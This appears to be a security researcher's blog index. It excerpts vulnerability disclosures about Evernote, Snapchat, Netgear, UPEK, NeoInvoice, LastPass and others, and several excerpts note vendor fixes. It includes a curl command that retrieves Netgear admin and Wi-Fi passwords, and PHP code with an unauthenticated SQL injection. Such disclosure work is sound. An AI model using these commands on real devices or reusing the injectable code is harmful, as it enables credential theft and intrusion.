Evernote: XOR & Passwords
Update: Evernote has reported that this issue has been addressed.
Evernote for Android stores various settings in an XML, this file though isn’t really protected – it’s easily readable, especially if an attacker is able to get physical access to a device, what’s worse is that it contains the user’s credentials.
/data/data/com.evernote/shared_prefs/com.evernote_preferences.xmlThe username in located in the
Read more…<string name="username">element, and the password is stored in<string name="encrypted_password">– from the name you’d assume that the password is actually encrypted. You’d be wrong.Revisiting Snapchat API & Security
As Shapchat has increased in popularity, I’ve been asked several times to revisit my Snapchat API & Security post, to address the changes that they made in response to my complaints. So, here is it – sorta.
I started making detailed notes and looking at the changes they made – but yesterday @tlack made that mostly irrelevant with his release of Snaphax, a PHP library to interact with the undocumented Shapchat API. So for now, if you want to know more about their API or if you just want to save images or video – I’d suggest taking a good look at the Snaphax code. What I will do though, is talk about some of their changes and what they did right and what they did wrong.
Read more…Netgear Admin Password Disclosure
Some (though not all) Netgear products expose the administrator password to unauthorized users in a file named
/cgi-bin/<model>.log– if the device is vulnerable, you’ll get something like this:>curl http://<ip>/cgi-bin/WNR2000XT.log Admin login name admin Admin password <snip> Country Europe Wireless network name (SSID) wireless_ext Wireless channel 6 Security type WPA2-PSK(AES) Wireless passphrase <snip>The full list of devices that are vulnerable isn’t known; the issue was presented to Netgear, but no response was received. To help identify the vulnerable devices, I pulled a list of all Netgear devices and wrote this script:
Read more…UPEK Windows Password Decryption
On August 28th ElcomSoft announced that they had determined a method to extract Windows passwords from the registry for users of UPEK’s fingerprint readers and Protector Suite software (UPEK is now owned by AuthenTec, which is now owned by Apple). What they didn’t announce was the technical details of how they did it. Myself and Brandon Wilson have been working to recreate their research – and we have.
We have not been in contact with ElcomSoft, so this is an independent re-discovery of this vulnerability. ElcomSoft has committed to not release details, which I understand – but given how likely it is that others will determine this technique, I believe that this information should be available to pen-testers and auditors so that these insecure credentials can be identified.
Read more…NeoInvoice Blind SQL Injection (CVE-2012-3477)
NeoInvoice is a multi-tenant open source invoicing system, that currently contains an unauthenticated blind SQL injection condition in
signup_check.php. The input for thevaluefield isn’t being properly sanitized, and is used in string concatenation to create the SQL query:require_once("config.php"); if (isset($_GET['field']) && ($_GET['field'] == 'username' || $_GET['field'] == 'email')) { $field = $_GET['field']; $table = 'user'; $taken = '0'; $not_taken = '1'; } else if (isset($_GET['field']) && $_GET['field'] == 'coupon') { $field = 'name'; $table = 'coupon'; $taken = '1'; $not_taken = '0'; } else { die("<div class=\"error\">Invalid Field</div>"); } if (!isset($_GET['value'])) { die("<div class=\"error\">Invalid Value</div>"); } $value = preg_replace("[^a-zA-Z0-9_.\-\*\/\+\, @]", "", $_GET['value']); if ($value != $_GET['value']) { die("<div class=\"error\">Invalid Value</div>"); } $connect = mysql_connect(MYSQL_HOSTNAME, MYSQL_USERNAME, MYSQL_PASSWORD); if (!$connect) { die("<div class=\"error\">" . mysql_error() . "</div>"); } $query = "SELECT $field FROM $table WHERE $field = '$value' LIMIT 1"; mysql_select_db(MYSQL_DATABASE, $connect); $result = mysql_query($query, $connect); if (mysql_num_rows($result)) { echo $taken; } else { echo $not_taken; }Line #29 there is the key, by concatenating untrusted data into the SQL query, it has made SQL injection trivial. This vulnerability can be demonstrated with the following request:
Read more…Decrypting Spark Saved Passwords
A friend of mine has been evaluating an open source instant messaging client called Spark, which can be linked to Active Directory for authentication. Like most IM clients, Spark allows users to save their password – and me being me, I was curious as to how it’s doing this – as storing Windows domain logins is kinda a big deal.
So, within a few minutes I found all of the details – and none of them make me feel any better. Here are the important bits:
Read more…Snapchat: API & Security
Update 3: In 2014 the FTC filed a complaint against Snapchat for their failure to provide the level of security they promised. The findings listed below were sent to the founders of Snapchat, that email was quoted in the FTC compliant as proof that Snapchat was aware of these issues.
Update 2: The Snapchat API has changed to address the issues I pointed out to them – and the new API has issues as well. I’ve posted an update that covers some of these changes.
Read more…Slipping Past LastPass
Update: LastPass has confirmed that they’ll address this issue in the next release.
Update 2: LastPass has addressed this issue in their new v2.0 release. There is still a way to bypass the password prompt in Chrome, but they will address that in the next release. Overall, it looks like we can close the books on this one.
I’m a big fan of LastPass – it’s a great service that has impressed me every step of the way. Though it’s not perfect, and I’ve found a small hole that makes it easier for an attacker to get your passwords – if the following are true:
Read more…Poking Mykonos
While checking on the latest updates in the start-up world from TechCrunch, I came across their article on Mykonos; the important part of their article (at least for me), is this:
Mykonos’s Web Security product uses deception to “detect, confuse, slow down and prevent attackers” in real-time in order to help companies protect their websites and Web apps from malicious hacker and proactively prevent fraud and theft.
A couple of minutes of reading, and my interest was piqued – to say the least. The thing that most interested me was the claim of no false positives, while they do talk about it – I really wanted to see it for myself. Assuming they used their own product to protect their site, I took a few minutes to see what I could find – and find I did.
Read more…Google Chrome Leaking Credit Card Data?
While testing ccsrch I noticed a number that looked familiar – my debit card number. Now, being just a little paranoid, I don’t leave such information on my system unencrypted – so seeing it was a real surprise. But, here’s the real kicker: it was on my work PC, where it never should have been. But there it was, plain as day, in clear text. I spent a couple of minutes staring at the log trying to figure out why it would be there.
Read more…
About Me
Security researcher, engineer and software developer with more than 20 years of experience.
Work: I primarily focus on application security, usable security, secure communications, and cryptography. I build and lead strong and dynamic teams, who cover all facets of security and privacy.
Writing: I write about my research, security in general, development and software design, and leadership through my blog, essays, and various publications. I also engage in some creating writing when I can.
Photography: I am a purist fine art photographer, working primarily in black & white, and focused on sharing new perspectives of the world. Limited edition prints of my work are available on my online gallery. I also have a background in photojournalism, and volunteer in this field when I can.